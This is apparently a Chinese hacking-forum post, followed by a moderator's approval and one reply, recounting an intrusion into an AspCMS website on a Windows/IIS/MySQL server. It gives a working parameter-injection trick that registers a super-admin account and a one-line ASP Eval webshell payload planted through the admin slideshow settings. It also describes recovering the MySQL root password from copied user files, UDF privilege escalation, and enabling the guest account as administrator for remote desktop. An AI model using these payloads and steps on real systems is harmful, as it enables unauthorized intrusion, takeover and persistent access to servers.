|
目标系统 Os:Win2008+Iis7.5 Mysql 5.5 开放端口:21 22 80 3306 3389
目标站点是aspcms 存在默认的后台地址/admin_aspcms/login.asp,之前在乌云看到了一篇aspcms全版本权限提升漏洞通过/member/reg.asp 注册普通用户时修改post参数可提升为管理员
打开burp进行抓包修改,默认的参数是&Gander=1 修改为Gander=1,1,1,1,1,1,1,1)%16 选中%16按ctrl+shift+u进行编码截断,此原理是在注 册用户的时候没有判断性别参数 Gender 是否为数字,插入数据库的时候没有用引号引起来,导致过滤函数不起作用。利用 Access16% 截断技巧注释掉后面的语句,可以直接注册 GroupID 为 1 的超级管理员组用户。
发送后会显示注册成功,这时登陆后台用刚才注册的用户密码直接就是管理员
在界面风格--》编辑模板css文件--》添加模板中写入一句话
保存时居然提示错误的文件名… 看来有所防备 记得aspcms还有一个后台拿webshell的方法 在拓展功能--》幻灯片设置--》幻灯样式上右键审查元素
把value的值改为 一句话%><%Eval(Request(chr(65)))%><% 密码a,不要忘记保存,菜刀地址在xxx.com/config/AspCms_Config.asp
激动!!成功链接 下一步传大马 挨个目录翻了翻,装的东西很少,没有serv-u,radmin,Pcanywhrer,mssql等等一切有机会提权的东西,看了看systeminfo 看到这长长的一串补丁顿时绝望,传了几个exp'均失败告终,在翻目录中看到有mysql目录,看来这个网站是支持php的,想到了udf提权,找到了mysql安装目录但是不知道root密码,百度后得到一个方法把mysql\data\mysql目录中的user.frm,user.myd,user.myi这三个文件下载到本地,用十六进制编辑器查看但是mysql密码显示不全(不到40位) 还有一种方法就是本地安装mysql替换本地的这三个文件,然后进入安全模式查看密码,还好之前安装了wamp
替换后切换到mysql5.6.17\ 目录就是mysql根目录,在my.ini文件中【mysqld】添加如下一行启动安全模式 登陆后不需要验证密码
输入查询语句select host,user,passwors from mysql.user 令人激动的场景发生了
在soumd5解密后root密码是123456 居然会用那么简单的密码 早知道先多试几次了~~ 传个php马上去,链接mysql成功,安装路径自动出来了,如果mysql版本小于mysql5.1时安装目录是c:\windows 如果>mysql5.1时 那么安装目录就是mysql\lib\plugin,有时候检查下plugin目录是否存在,需要手动去创建不然安装会报错。
提权成功!!!然后就是激活guest账户并添加到管理组,因为原本打开了3389所以直接通过链接就ok了
大功告成!!
======================================
提权过程并不算是“艰难”,但是一些方法和
一些思路很值得借鉴,虽然部分内容有些欠缺,总体来说
还是可以,三思后,通过。
| 
楼主
这是常规提权好不好啊root权限导出dll执行命令